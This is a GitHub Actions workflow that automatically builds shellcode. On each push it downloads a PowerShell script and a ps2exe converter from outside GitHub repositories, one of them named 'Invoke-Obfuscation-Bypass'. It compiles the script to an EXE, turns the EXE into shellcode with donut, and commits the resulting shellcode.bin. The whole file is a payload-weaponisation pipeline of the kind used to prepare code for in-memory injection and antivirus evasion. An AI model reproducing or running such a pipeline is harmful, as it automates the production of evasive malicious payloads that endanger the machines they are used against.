name: Convert and Upload Shellcode

on:
  push:
    paths:
      - download.ps1

permissions:
  contents: write

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Download the latest download.ps1
      run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/43a1723/test/main/download.ps1 -OutFile download.ps1
      shell: powershell

    - name: Download ps2exe.ps1
      run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/AdminTest0/Invoke-Obfuscation-Bypass/main/ps2exe.ps1 -OutFile ps2exe.ps1
      shell: powershell

    - name: Create output folder
      run: |
        $outputDir = ".\output"
        if (-Not (Test-Path $outputDir)) {
            New-Item -ItemType Directory -Path $outputDir -Force
        }
      shell: pwsh
      
    - name: Convert PS1 to EXE using ps2exe
      run: |
        $ps2exePath = ".\ps2exe.ps1"
        $inputScript = ".\download.ps1"
        $outputExe = ".\output\download.exe"
        powershell -File $ps2exePath -inputFile $inputScript -outputFile $outputExe
      shell: pwsh

    - name: Convert EXE to Shellcode
      run: .\donut_v1.0\donut.exe -i .\output\download.exe -o .\output\shellcode.bin
      shell: powershell

    - name: Commit and Push changes
      run: |
        git config --global user.name 'github-actions[bot]'
        git config --global user.email 'github-actions[bot]@users.noreply.github.com'
        git add .\output
        git commit -m "Add updated shellcode.bin"
        git push
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      shell: pwsh
